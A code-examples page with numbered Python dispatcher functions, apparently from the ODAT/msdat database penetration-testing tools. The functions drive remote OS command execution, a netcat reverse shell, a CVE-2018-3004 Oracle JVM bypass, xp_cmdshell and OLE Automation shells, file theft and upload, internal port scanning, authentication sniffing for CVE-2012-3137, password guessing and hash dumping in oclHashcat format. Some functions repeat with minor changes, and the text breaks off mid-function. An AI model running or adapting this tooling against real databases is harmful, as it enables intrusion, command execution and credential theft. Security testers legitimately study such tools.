    optional self-test, optional read of a file on the server through
    readAFile().

    Args:
        args: option mapping. Keys read here: "test-module", "getFile",
            "server" and "print" (the output helper object).

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False:
        return EXIT_MISS_ARGUMENT
    ctxsys = Ctxsys(args)
    ctxsys.connection(stopIfError=True)
    if args['test-module'] == True:
        # NOTE(review): the title names DBMSScheduler inside the CTXSYS
        # module; it looks copy-pasted. The string is kept as it is.
        args['print'].title("Test if the DBMSScheduler library can be used")
        ctxsys.testAll()
    # Option 1: read file
    if args['getFile'] != None:
        printer = args['print']
        wantedFile = args['getFile']
        printer.title("Read the {0} file on the {1} server".format(wantedFile, args['server']))
        data = ctxsys.readAFile(wantedFile)
        if isinstance(data, Exception):
            # The exception object doubles as the failure description.
            printer.badNews("Impossible to read the {0} file: {1}".format(wantedFile, data))
        elif data == '':
            # An empty result does not tell an empty file from a missing one.
            printer.goodNews("The {0} file is empty or it doesn't exist".format(wantedFile))
        else:
            printer.goodNews("Data stored in the {0} file (escape char replace by '\\n'):\n{1}".format(wantedFile, data))
    # NOTE(review): no close() call is made on the Ctxsys object here.
Example #20
def runjavaModule(args):
    """Run the JAVA module according to the options in *args*.

    Steps: option validation, Java connection, optional self-test,
    optional OS command, optional interactive pseudo shell, optional
    reverse shell, optional CVE-2018-3004 file creation, then close().

    Args:
        args: option mapping. Keys read here: "test-module", "exec",
            "shell", "reverse-shell" (indexed as [0] = local ip,
            [1] = local port), "create-file-CVE-2018-3004" (indexed as
            [0] = data, [1] = remote file name), "server" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "shell", "reverse-shell", "exec", "create-file-CVE-2018-3004"]) == False:
        return EXIT_MISS_ARGUMENT
    javaModule = Java(args)
    javaModule.connection(stopIfError=True)
    if args['test-module'] == True:
        # NOTE(review): the title names DBMSScheduler inside the JAVA
        # module; it looks copy-pasted. Kept as it is.
        args['print'].title("Test if the DBMSScheduler library can be used")
        javaModule.testAll()
    # Option 1: exec
    if args['exec'] != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'], args['server']))
        # The return value is not inspected in this function.
        javaModule.execOSCommand(cmd=args['exec'], printResponse=True,
                                 needCreateClassAndFunction=True,
                                 needDeleteClassAndFunction=True)
    # Option 2: shell
    if args['shell'] == True:
        args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
        javaModule.getInteractiveShell()
    # Option 3: reverse shell
    if args['reverse-shell'] != None:
        args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
        endpoint = args['reverse-shell']
        javaModule.giveReverseShell(localip=endpoint[0], localport=endpoint[1])
    # Option 4: Bypass built in Oracle JVM security through Deserialization (CVE-2018-3004)
    if args['create-file-CVE-2018-3004'] != None:
        printer = args['print']
        request = args['create-file-CVE-2018-3004']
        printer.title("Try to create the file {0} on {1}".format(request[1], args['server']))
        result = javaModule.createOrAppendFileViaCVE_2018_3004(data=request[0], remoteFilename=request[1])
        if isinstance(result, Exception):
            printer.badNews("Impossible to create the file {0}: {1}".format(request[1], result))
        elif result == True:
            printer.goodNews("The file {0} has been created on the target with data '{1}'".format(request[1], request[0]))
        # NOTE(review): any other return value produces no message at all.
    javaModule.close()
Example #21
def runExternalTableModule (args):
    """Dispatch the External Table module options held in *args*.

    Validates the options, connects an ExternalTable object, then runs the
    self-test, reads a remote file with getFile() and/or calls execute()
    on a file stored on the server, as requested.

    Args:
        args: option mapping. Keys read here: "test-module", "getFile"
            (indexed as [0] = remote path, [1] = remote file name,
            [2] = local file), "exec" (indexed as [0] = remote path,
            [1] = remote file name) and "print".

    Returns:
        EXIT_MISS_ARGUMENT when option validation fails, otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    externalTable = ExternalTable(args)
    externalTable.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the External Table module can be used")
        externalTable.testAll()
    # Option 1: getFile
    if args['getFile'] != None:
        out = args['print']
        wanted = args['getFile']
        out.title("Read the {0} file stored in the {1} path".format(wanted[1], wanted[0]))
        content = externalTable.getFile(remotePath=wanted[0], remoteNameFile=wanted[1], localFile=wanted[2])
        if isinstance(content, Exception):
            out.badNews("There is an error: {0}".format(content))
        else:
            out.goodNews("Data stored in the remote file {0} stored in {1}".format(wanted[1], wanted[0]))
            # The content is written with plain print(), not the output helper.
            print(content)
    # Option 2: exec a script or command
    if args['exec'] != None:
        out = args['print']
        target = args['exec']
        out.title("Execute the {0} command stored in the {1} path".format(target[1], target[0]))
        outcome = externalTable.execute(remotePath=target[0], remoteNameFile=target[1])
        if isinstance(outcome, Exception):
            out.badNews("There is an error: {0}".format(outcome))
        else:
            # "(normally)" in the message: success means no exception came back.
            out.goodNews("The {0} command stored in {1} has been executed (normally)".format(target[1], target[0]))
    # NOTE(review): no close() call is made on the ExternalTable object here.
Example #22
def runUnwrapperModule(args):
    """Dispatch the unwrapper module options held in *args*.

    At least one of "test-module", "object-name" or "file" has to be set.
    The self-test runs on an Unwrapper built with offline=False; "file"
    builds an offline instance; "object-name" builds and connects an
    online instance and unwraps the remote object; "file" then unwraps
    the local file.

    Args:
        args: option mapping. Keys read here: "test-module",
            "object-name", "object-type", "file" and "print".

    Returns:
        EXIT_MISS_ARGUMENT when no option was chosen or option validation
        fails, otherwise None.
    """
    def _report(code, failureMessage):
        # None is the only value treated as "no source code obtained".
        if code == None:
            args['print'].badNews(failureMessage)
        else:
            args['print'].goodNews(code)

    if args['test-module'] == False and args['object-name'] == None and args['file'] == None:
        logging.critical("You must choose --test-module or/and --object-name or/and --file")
        return EXIT_MISS_ARGUMENT
    if args['test-module'] == True:
        args['print'].title("Test if the Unwrapper module can be used")
        # NOTE(review): testAll() runs without a connection() call on this
        # instance; confirm that testAll() does not need one.
        unwrapper = Unwrapper(args, offline=False)
        unwrapper.testAll()
    if args['file'] != None:
        unwrapper = Unwrapper(args, offline=True)
    if args['object-name'] != None:
        if checkOptionsGivenByTheUser(args, ["test-module", "object-name"]) == False:
            return EXIT_MISS_ARGUMENT
        # NOTE(review): when "file" is set as well, this replaces the
        # offline instance, so the local unwrap below runs on the online one.
        unwrapper = Unwrapper(args, offline=False)
        unwrapper.connection(stopIfError=True)
        args['print'].title("Unwrapping PL/SQL source code of {0} stored in the remote database".format(args['object-name']))
        _report(
            unwrapper.unwrapRemotely(args['object-name'], objectType=args['object-type']),
            "Impossible to get the source code or to unwrap it. Is it wrapped? Have you permissions?...",
        )
    if args['file'] != None:
        args['print'].title("Unwrapping PL/SQL source code stored in the local file named {0}".format(args['file']))
        _report(
            unwrapper.unwrapLocally(args['file']),
            "Impossible to read the source code or to unwrap it. Is it wrapped? Have you permissions?...",
        )
Example #23
def runExternalTableModule(args):
    """
    Run the External Table module from the parsed options in args.

    Handles 'test-module', 'getFile' (remote path, remote file name, local
    file) and 'exec' (remote path, remote file name). Returns
    EXIT_MISS_ARGUMENT when the option check fails.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    externalTable = ExternalTable(args)
    externalTable.connection(stopIfError=True)
    out = args["print"]
    if args["test-module"] == True:
        out.title("Test if the External Table module can be used")
        externalTable.testAll()

    # Option 1: getFile
    fileSpec = args["getFile"]
    if fileSpec is not None:
        remotePath, remoteName = fileSpec[0], fileSpec[1]
        out.title("Read the {0} file stored in the {1} path".format(remoteName, remotePath))
        result = externalTable.getFile(remotePath=remotePath, remoteNameFile=remoteName, localFile=fileSpec[2])
        if isinstance(result, Exception):
            out.badNews("There is an error: {0}".format(result))
        else:
            out.goodNews("Data stored in the remote file {0} stored in {1}".format(remoteName, remotePath))
            # Single parenthesised value: same output as the Python 2 print statement.
            print(result)

    # Option 2: exec a script or command
    execSpec = args["exec"]
    if execSpec is not None:
        remotePath, remoteName = execSpec[0], execSpec[1]
        out.title("Execute the {0} command stored in the {1} path".format(remoteName, remotePath))
        result = externalTable.execute(remotePath=remotePath, remoteNameFile=remoteName)
        if isinstance(result, Exception):
            out.badNews("There is an error: {0}".format(result))
        else:
            out.goodNews("The {0} command stored in {1} has been executed (normally)".format(remoteName, remotePath))
Example #24
def runDbmsadvisorModule(args):
    '''
    Run the DBMSAdvisor module.

    Handles 'test-module' and 'putFile' (remote path, remote file name,
    local file), then closes the DbmsAdvisor object. Returns
    EXIT_MISS_ARGUMENT when the option check fails.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "putFile"]) == False:
        return EXIT_MISS_ARGUMENT
    dbmsAdvisor = DbmsAdvisor(args)
    dbmsAdvisor.connection(stopIfError=True)
    out = args['print']
    if args['test-module'] == True:
        out.title("Test if the DBMSAdvisor library can be used")
        dbmsAdvisor.testAll()
    # Option 1: putLocalFile
    putSpec = args['putFile']
    if putSpec is not None:
        localFile, remotePath, remoteName = putSpec[2], putSpec[0], putSpec[1]
        out.title("Put the {0} local file in the {1} path (named {2}) of the {3} server".format(
            localFile, remotePath, remoteName, args['server']))
        outcome = dbmsAdvisor.putFile(remotePath, remoteName, localFile=localFile)
        # Anything other than True is reported as the failure reason.
        if outcome == True:
            out.goodNews("The {0} local file was put in the remote {1} path (named {2})".format(
                localFile, remotePath, remoteName))
        else:
            out.badNews("The {0} local file was not put in the remote {1} path (named {2}): {3}".format(
                localFile, remotePath, remoteName, str(outcome)))
    dbmsAdvisor.close()
Example #25
def runOleAutomationModule(args):
	'''
	Run the OLE Automation module.

	After connecting, handles in this order: test-module,
	enable-ole-automation, read-file, write-file, get-file, put-file,
	exec-sys-cmd and disable-ole-automation. Each outcome is reported
	through args['print'] and the connection is closed at the end.
	Returns EXIT_MISS_ARGUMENT when the option check fails.
	'''
	handledOptions = ["read-file","write-file","get-file","put-file","exec-sys-cmd","enable-ole-automation","disable-ole-automation"]
	if checkOptionsGivenByTheUser(args, handledOptions, checkAccount=True) == False:
		return EXIT_MISS_ARGUMENT
	oleAutomation = OleAutomation(args)
	oleAutomation.connect()
	out = args['print']
	if args["test-module"] == True:
		oleAutomation.testAll()
	if args["enable-ole-automation"] == True:
		out.title("Try to enable OLE Automation")
		outcome = oleAutomation.enableOLEAutomationProcedures()
		if isinstance(outcome, Exception):
			out.badNews("Impossible to enable OLE Automation: '{0}'".format(outcome))
		else:
			out.goodNews("OLE Automation is enabled")
	if args["read-file"] is not None:
		remoteFile = args['read-file'][0]
		out.title("Try to read the remote file {0}".format(remoteFile))
		outcome = oleAutomation.readFile(remoteFile)
		if isinstance(outcome, Exception):
			out.badNews("The file can't be read: '{0}'".format(outcome))
		else:
			out.goodNews("Data in the file {0}:\n{1}".format(remoteFile, outcome))
	if args["write-file"] is not None:
		remoteFile, payload = args['write-file'][0], args['write-file'][1]
		out.title("Try to write this data on the remote file {0}: '{1}'".format(remoteFile, payload))
		outcome = oleAutomation.writeFile(remoteFile, payload)
		if isinstance(outcome, Exception):
			out.badNews("Data cannot be written: '{0}'".format(outcome))
		else:
			out.goodNews("Data has been written in the file {0}".format(remoteFile))
	if args["get-file"] is not None:
		remoteFile, localFile = args['get-file'][0], args['get-file'][1]
		out.title("Try to copy the remote file {0} to {1}".format(remoteFile, localFile))
		outcome = oleAutomation.getFile(remoteFile, localFile)
		# getFile/putFile signal success with True; any other value is shown as the error.
		if outcome == True:
			out.goodNews("The remote file {0} has been copied in {1}".format(remoteFile, localFile))
		else:
			out.badNews("Impossible to get the remote file {0}: '{1}'".format(remoteFile, outcome))
	if args["put-file"] is not None:
		localFile, remoteFile = args['put-file'][0], args['put-file'][1]
		out.title("Try to copy the local file {0} to {1}".format(localFile, remoteFile))
		outcome = oleAutomation.putFile(localFile, remoteFile)
		if outcome == True:
			out.goodNews("The local file {0} has been copied in {1}".format(localFile, remoteFile))
		else:
			out.badNews("Impossible to put the local file {0} to {1}: '{2}'".format(localFile, remoteFile, outcome))
	if args["exec-sys-cmd"] is not None:
		command = args['exec-sys-cmd'][0]
		out.title("Try to execute a Windows system command: '{0}'".format(command))
		outcome = oleAutomation.executeSysCmd(command, wait=True)
		if outcome == True:
			out.goodNews("The system command has been executed on the remote server")
		else:
			out.badNews("Impossible to execute the Windows system command: {0}".format(outcome))
	if args["disable-ole-automation"] == True:
		out.title("Try to disable OLE Automation")
		outcome = oleAutomation.disableOLEAutomationProcedures()
		if isinstance(outcome, Exception):
			out.badNews("Impossible to disable OLE Automation: '{0}'".format(outcome))
		else:
			out.goodNews("OLE Automation is disabled")
	oleAutomation.closeConnection()
Example #26
def runUtlHttpModule(args):
    '''
    Run the UTL_HTTP module.

    Handles 'test-module', 'send' (three values, the third being the file
    that holds the HTTP request) and 'scan-ports' (target, port
    specification). Returns EXIT_MISS_ARGUMENT when the option check fails
    and -1 when the port specification is rejected.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "scan-ports", "send"]) == False:
        return EXIT_MISS_ARGUMENT
    utlHttp = UtlHttp(args)
    utlHttp.connection(stopIfError=True)
    utlHttp.setTimeout(5)
    out = args['print']
    if args['test-module'] == True:
        out.title("Test if the UTL_HTTP library can be used")
        utlHttp.testAll()
    # Option 1: sendRequest
    sendSpec = args['send']
    if sendSpec is not None:
        out.title("Send the HTTP request stored in the {0} file".format(sendSpec[2]))
        reply = utlHttp.sendRequest(sendSpec[0], sendSpec[1], sendSpec[2])
        if isinstance(reply, Exception):
            out.badNews("Impossible to send the request: {0}".format(reply))
        else:
            out.goodNews("Response from the server:\n{0}".format(reply))
    # Option 2: scan-ports
    if args['scan-ports'] is not None:
        portSpec = args['scan-ports'][1]
        if "," in portSpec:
            ports = portSpec.split(',')
        elif '-' in portSpec:
            bounds = portSpec.split('-')
            # range() stops before the upper bound, so "A-B" yields A .. B-1.
            ports = [str(aPort) for aPort in range(int(bounds[0]), int(bounds[1]))]
            if ports == []:
                logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(portSpec))
                return -1
        elif portSpec.isdigit() == True:
            ports = [portSpec]
        else:
            logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(portSpec))
            return -1
        target = args['scan-ports'][0]
        out.title("Scan ports ({0}) of {1} ".format(portSpec, target))
        scanResults = utlHttp.scanTcpPorts(httpObject=utlHttp, ip=target, ports=ports)
        utlHttp.printScanPortResults(scanResults)
    utlHttp.close()
Example #27
def runHttpUriTypeModule(args):
    '''
    Run the HTTPURITYPE module.

    Handles 'test-module', 'httpUrl' (the response is also written to
    args['outputFile'] when that is set) and 'scan-ports' (target, port
    specification). Returns EXIT_MISS_ARGUMENT when the option check fails
    and -1 when the port specification is rejected.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "httpUrl", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    httpUriType = HttpUriType(args)
    httpUriType.connection(stopIfError=True)
    out = args['print']
    if args['test-module'] == True:
        out.title("Test if the HTTPURITYPE library can be used")
        httpUriType.testAll()
    # Option 1: httpUrl
    if args['httpUrl'] is not None:
        out.title("Send a GET request from {0} to {1}".format(args['connectionStr'], args['httpUrl']))
        reply = httpUriType.sendGetRequest(url=args['httpUrl'])
        if isinstance(reply, Exception):
            out.badNews("HTTP GET request failed")
        else:
            out.goodNews("The server response is:\n {0}".format(reply))
            if args['outputFile'] is not None:
                httpUriType.writeFile(args['outputFile'], str(reply))
    # Option 2: scan-ports
    if args['scan-ports'] is not None:
        portSpec = args['scan-ports'][1]
        if "," in portSpec:
            ports = portSpec.split(',')
        elif '-' in portSpec:
            bounds = portSpec.split('-')
            # range() stops before the upper bound, so "A-B" yields A .. B-1.
            ports = [str(aPort) for aPort in range(int(bounds[0]), int(bounds[1]))]
            if ports == []:
                logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(portSpec))
                return -1
        elif portSpec.isdigit() == True:
            ports = [portSpec]
        else:
            logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(portSpec))
            return -1
        target = args['scan-ports'][0]
        out.title("Scan ports ({0}) of {1} ".format(portSpec, target))
        scanResults = httpUriType.scanTcpPorts(httpObject=httpUriType, ip=target, ports=ports)
        httpUriType.printScanPortResults(scanResults)
    httpUriType.close()
Example #28
def runXpCmdShellModule(args):
    '''
    Run the XpCmdShell module.

    After connecting, handles in this order: test-module, put-file (local
    file, remote file, width), enable-xpcmdshell, shell and
    disable-xpcmdshell, then closes the connection. Returns
    EXIT_MISS_ARGUMENT when the option check fails.
    '''
    handledOptions = ["test-module", "shell", "enable-xpcmdshell", "disable-xpcmdshell", "put-file"]
    if checkOptionsGivenByTheUser(args, handledOptions, checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    # Stays True unless an enable attempt below reports otherwise.
    enableSucceeded = True
    xpcmdshell = Xpcmdshell(args)
    xpcmdshell.connect()
    out = args['print']
    if args["test-module"] == True:
        xpcmdshell.testAll()
    if args["put-file"] is not None:
        localFile, remoteFile = args['put-file'][0], args['put-file'][1]
        out.title("Try to copy the local file {0} to {1} with powershell".format(localFile, remoteFile))
        outcome = xpcmdshell.uploadFileWithPowershell(localFile, remoteFile, width=int(args['put-file'][2]))
        if outcome == True:
            out.goodNews("The local file {0} has been copied in {1}".format(localFile, remoteFile))
        else:
            out.badNews("Impossible to put the local file {0} to {1}: '{2}'".format(localFile, remoteFile, outcome))
    if args["enable-xpcmdshell"] == True:
        out.title("Re-enable Xpcmdshell")
        enableSucceeded = xpcmdshell.enableXpcmdshell()
        if enableSucceeded == True:
            out.goodNews("Xpcmdshell is re-enabled")
        else:
            out.badNews("Xpcmdshell is NOT re-enabled")
    if args["shell"] == True:
        out.title("Trying to get a shell thanks to xpcmdshell")
        outcome = xpcmdshell.getInteractiveShell()
        if outcome == True:
            out.goodNews("Good Bye :)")
        else:
            out.badNews("Impossible to get a shell on the database")
    # The disable step is skipped when a preceding enable attempt failed.
    if args["disable-xpcmdshell"] == True and enableSucceeded == True:
        out.title("Disable Xpcmdshell")
        outcome = xpcmdshell.disableXpcmdshell()
        if outcome == True:
            out.goodNews("Xpcmdshell is disabled")
        else:
            out.badNews("Xpcmdshell is NOT disabled: {0}".format(outcome))
    xpcmdshell.closeConnection()
Example #29
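def runCVE20123137Module(args):
    '''
    Run the CVE_2012_3137 module.

    Handles 'test-module', 'get-all-passwords' (refused unless the effective
    uid is 0) and 'decrypt-sessions' (two values passed to decryptKeys).
    Returns EXIT_MISS_ARGUMENT when the option check fails.
    '''
    if checkOptionsGivenByTheUser(
            args, ["test-module", "get-all-passwords", "decrypt-sessions"],
            checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    cve = CVE_2012_3137(args,
                        accountsFile=args['user-list'],
                        timeSleep=args['timeSleep'])
    if args['test-module'] == True:
        cve.testAll()
    #Option 1: get all passwords
    if args['get-all-passwords'] != None:
        # Under Python 2 a bare print statement emits a blank line.
        print
        if geteuid() != 0:
            args['print'].badNews(
                "Sorry, you need to run this as root because I need to sniff authentications to the database"
            )
        else:
            args['print'].title(
                "Getting remote passwords on the {0} server, port {1}".format(
                    args['server'], args['port']))
            cve.getPasswords()
            keys = cve.getKeys()
            if keys != []:
                joinedKeys = '\n'.join(keys)
                args['print'].goodNews("Here are keys:\n\n{0}".format(joinedKeys))
                filename = "sessions-{0}-{1}-{2}{3}".format(
                    args['server'], args['port'], args['sid'],
                    CHALLENGE_EXT_FILE)
                # NOTE(review): this file holds captured session material and is
                # created in the working directory with the default umask while
                # running as root; treat it as sensitive and restrict access.
                # The context manager closes the handle even if write() raises.
                with open(filename, "w") as f:
                    f.write(joinedKeys)
                args['print'].goodNews(
                    "Sessions strored in the {0} file.".format(filename))
            else:
                args['print'].badNews(
                    "Impossible to exploit this vulnreability")
    #Option 2: decrypt sessions
    if args['decrypt-sessions'] != None:
        args['print'].title("Decrypt sessions stored in {0} via {1}".format(
            args['decrypt-sessions'][0], args['decrypt-sessions'][1]))
        passwds = cve.decryptKeys(args['decrypt-sessions'][0],
                                  args['decrypt-sessions'][1])
        if passwds != []:
            # One "first:second" line per recovered entry.
            passwordsStr = "".join(
                '{0}:{1}\n'.format(e[0], e[1]) for e in passwds)
            args['print'].goodNews("Accounts found:\n{0}".format(passwordsStr))
        else:
            args['print'].badNews("No password has been found")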
Example #30
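def runXpDirectoryModule(args):
	'''
	Run the XpDirectory module.

	After connecting, handles in this order: test-module, list-files,
	list-dir, list-fixed-drives, list-available-media, file-exists and
	create-dir, then closes the connection. A helper result that is an
	Exception instance is reported as a failure. Returns
	EXIT_MISS_ARGUMENT when the option check fails.
	'''
	if checkOptionsGivenByTheUser(args,['list-files','list-dir','list-fixed-drives','list-available-media','file-exists','create-dir'],checkAccount=True) == False : return EXIT_MISS_ARGUMENT
	xpDirectory = XpDirectory(args)
	xpDirectory.connect()
	if args["test-module"] == True: xpDirectory.testAll()
	if args["list-files"] != None:
		args['print'].title("Try to list files stored in {0}".format(args["list-files"][0]))
		data= xpDirectory.listFilesViaXpDirtree(args["list-files"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to list files stored in {0}: {1}".format(args["list-files"][0],data))
		else:
			args['print'].goodNews("Files stored in {0}:\n{1}".format(args["list-files"][0],data))
	if args["list-dir"] != None:
		args['print'].title("Try to list directories stored in {0}".format(args["list-dir"][0]))
		data= xpDirectory.listDirectoriesViaXpSubdirs(args["list-dir"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to list files stored in {0}: {1}".format(args["list-dir"][0],data))
		else:
			args['print'].goodNews("Files stored in {0}:\n{1}".format(args["list-dir"][0],data))
	if args["list-fixed-drives"] == True:
		args['print'].title("Try to list drives with xp_subdirs")
		data= xpDirectory.listDrivesViaXpFixedDrives()
		if isinstance(data,Exception):
			# Only one value is passed to format(), so the placeholder must be {0};
			# the former {1} raised IndexError instead of reporting the failure.
			args['print'].badNews("Impossible to list drives with xp_subdirs: {0}".format(data))
		else:
			args['print'].goodNews("Drives:\n{0}".format(data))
	if args["list-available-media"] == True:
		args['print'].title("Try to list medias with xp_availablemedia")
		data= xpDirectory.listDrivesViaXpAvailableMedia()
		if isinstance(data,Exception):
			# Same single-argument format() fix as for the fixed-drives message.
			args['print'].badNews("Impossible to list drives with xp_availablemedia: {0}".format(data))
		else:
			args['print'].goodNews("Medias:\n{0}".format(data))
	if args["file-exists"] != None:
		args['print'].title("Try to check if the file {0} exists".format(args["file-exists"][0]))
		data= xpDirectory.isFileExistViaXpFileexist(args["file-exists"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to know if the file {0} exists: {1}".format(args["file-exists"][0],data))
		else:
			# Only the helper's result is printed; the file name is passed but unused.
			args['print'].goodNews("{1}".format(args["file-exists"][0],data))
	if args["create-dir"] != None:
		args['print'].title("Try to create the folder {0}".format(args["create-dir"][0]))
		data= xpDirectory.createSubDiViaXpCreateSubdir(args["create-dir"][0])
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to create the folder {0}: {1}".format(args["create-dir"][0],data))
		else:
			args['print'].goodNews("The folder {0} has been created".format(args["create-dir"][0]))
	xpDirectory.closeConnection()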
Example #31
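def runCVE20123137Module(args):
    """
    Run the CVE_2012_3137 module.

    Handles 'test-module', 'get-all-passwords' (refused unless the effective
    uid is 0) and 'decrypt-sessions' (two values passed to decryptKeys).
    Returns EXIT_MISS_ARGUMENT when the option check fails.
    """
    if (
        checkOptionsGivenByTheUser(args, ["test-module", "get-all-passwords", "decrypt-sessions"], checkAccount=False)
        == False
    ):
        return EXIT_MISS_ARGUMENT
    cve = CVE_2012_3137(args, accountsFile=args["user-list"], timeSleep=args["timeSleep"])
    if args["test-module"] == True:
        cve.testAll()
    # Option 1: get all passwords
    if args["get-all-passwords"] != None:
        # Under Python 2 a bare print statement emits a blank line.
        print
        if geteuid() != 0:
            args["print"].badNews(
                "Sorry, you need to run this as root because I need to sniff authentications to the database"
            )
        else:
            args["print"].title(
                "Getting remote passwords on the {0} server, port {1}".format(args["server"], args["port"])
            )
            cve.getPasswords()
            keys = cve.getKeys()
            if keys != []:
                joinedKeys = "\n".join(keys)
                args["print"].goodNews("Here are keys:\n\n{0}".format(joinedKeys))
                filename = "sessions-{0}-{1}-{2}{3}".format(
                    args["server"], args["port"], args["sid"], CHALLENGE_EXT_FILE
                )
                # NOTE(review): this file holds captured session material and is
                # created in the working directory with the default umask while
                # running as root; treat it as sensitive and restrict access.
                # The context manager closes the handle even if write() raises.
                with open(filename, "w") as f:
                    f.write(joinedKeys)
                args["print"].goodNews("Sessions strored in the {0} file.".format(filename))
            else:
                args["print"].badNews("Impossible to exploit this vulnreability")
    # Option 2: decrypt sessions
    if args["decrypt-sessions"] != None:
        args["print"].title(
            "Decrypt sessions stored in {0} via {1}".format(args["decrypt-sessions"][0], args["decrypt-sessions"][1])
        )
        passwds = cve.decryptKeys(args["decrypt-sessions"][0], args["decrypt-sessions"][1])
        if passwds != []:
            # One "first:second" line per recovered entry.
            passwordsStr = "".join("{0}:{1}\n".format(e[0], e[1]) for e in passwds)
            args["print"].goodNews("Accounts found:\n{0}".format(passwordsStr))
        else:
            args["print"].badNews("No password has been found")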
Example #32
def runPasswordGuesserModule(args):
	'''
	Run the PasswordGuesser module.

	With args['hostlist'] set, the hosts are read from that file and
	runPasswordGuesserModuleOnAHost is called once per entry after
	args['host'] and args['port'] are overwritten with the entry's first
	two values. Otherwise it is called once with args as given.
	Returns EXIT_MISS_ARGUMENT when the option check fails.
	'''
	if checkOptionsGivenByTheUser(args,["search"],checkAccount=False, allowHostsFile=True) == False:
		return EXIT_MISS_ARGUMENT
	out = args['print']
	if args['hostlist'] is None:
		out.title("Searching valid accounts on the {0} server, port {1}".format(args['host'], args['port']))
		runPasswordGuesserModuleOnAHost(args)
		return
	targets = getHostsFromFile(args['hostlist'])
	out.title("Searching valid accounts on these targets: {0}".format(targets))
	for target in targets:
		# args is mutated in place; the last entry's values remain after the loop.
		args['host'], args['port'] = target[0], target[1]
		out.subtitle("Searching valid accounts on the {0} server, port {1}".format(args['host'], args['port']))
		runPasswordGuesserModuleOnAHost(args)
Example #33
def runHttpUriTypeModule(args):
    """
    Run the HTTPURITYPE module.

    Handles 'test-module', 'httpUrl' (the response is also written to
    args['outputFile'] when that is set) and 'scan-ports' (target, port
    specification). Returns EXIT_MISS_ARGUMENT when the option check fails
    and -1 when the port specification is rejected.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "httpUrl", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    httpUriType = HttpUriType(args)
    httpUriType.connection(stopIfError=True)
    out = args["print"]
    if args["test-module"] == True:
        out.title("Test if the HTTPURITYPE library can be used")
        httpUriType.testAll()

    # Option 1: httpUrl
    if args["httpUrl"] is not None:
        out.title("Send a GET request from {0} to {1}".format(args["connectionStr"], args["httpUrl"]))
        reply = httpUriType.sendGetRequest(url=args["httpUrl"])
        if isinstance(reply, Exception):
            out.badNews("HTTP GET request failed")
        else:
            out.goodNews("The server response is:\n {0}".format(reply))
            if args["outputFile"] is not None:
                httpUriType.writeFile(args["outputFile"], str(reply))

    # Option 2: scan-ports
    if args["scan-ports"] is not None:
        portSpec = args["scan-ports"][1]
        if "," in portSpec:
            ports = portSpec.split(",")
        elif "-" in portSpec:
            bounds = portSpec.split("-")
            # range() stops before the upper bound, so "A-B" yields A .. B-1.
            ports = [str(aPort) for aPort in range(int(bounds[0]), int(bounds[1]))]
            if ports == []:
                logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(portSpec))
                return -1
        elif portSpec.isdigit() == True:
            ports = [portSpec]
        else:
            logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(portSpec))
            return -1
        target = args["scan-ports"][0]
        out.title("Scan ports ({0}) of {1} ".format(portSpec, target))
        scanResults = httpUriType.scanTcpPorts(httpObject=httpUriType, ip=target, ports=ports)
        httpUriType.printScanPortResults(scanResults)
    httpUriType.close()
Example #34
def runPasswordsModule(args):
	'''
	Run the Passwords module.

	Connects, loads an Info object into args['info'] when that key is
	absent, then handles 'test-module', 'get-passwords',
	'get-passwords-not-locked' and 'get-passwords-from-history'.
	Returns EXIT_MISS_ARGUMENT when the option check fails.
	'''
	handledOptions = ["test-module","get-passwords","get-passwords-from-history", "get-passwords-not-locked"]
	if checkOptionsGivenByTheUser(args, handledOptions) == False:
		return EXIT_MISS_ARGUMENT
	passwords = Passwords(args)
	passwords.connection(stopIfError=True)
	# Return value is discarded here; the call is repeated below where it is used.
	passwords.__getLockedUsernames__()
	if 'info' not in args:
		info = Info(args)
		info.loadInformationRemoteDatabase()
		args['info'] = info
	out = args['print']
	if args['test-module'] == True:
		out.title("Test if hashed passwords can be got")
		passwords.testAll()
	if args['get-passwords'] == True:
		out.title("Try to get Oracle hashed passwords")
		outcome = passwords.__tryToGetHashedPasswords__()
		if outcome == True:
			out.goodNews("Here are Oracle hashed passwords (some accounts can be locked):")
			passwords.printPasswords()
			out.goodNews("Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):")
			passwords.printPasswordsOclHashcat()
		else:
			out.badNews("Impossible to get hashed passwords: {0}".format(outcome))
	if args['get-passwords-not-locked'] == True:
		out.title("Try to get Oracle hashed passwords when the account is not locked")
		lockedUsernames = passwords.__getLockedUsernames__()
		outcome = passwords.__tryToGetHashedPasswords__(lockedUsernames)
		if outcome == True:
			out.goodNews("Here are Oracle hashed passwords (all accounts are opened, not locked):")
			passwords.printPasswords()
			out.goodNews("Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):")
			passwords.printPasswordsOclHashcat()
		else:
			out.badNews("Impossible to get hashed passwords: {0}".format(outcome))
	if args['get-passwords-from-history'] == True:
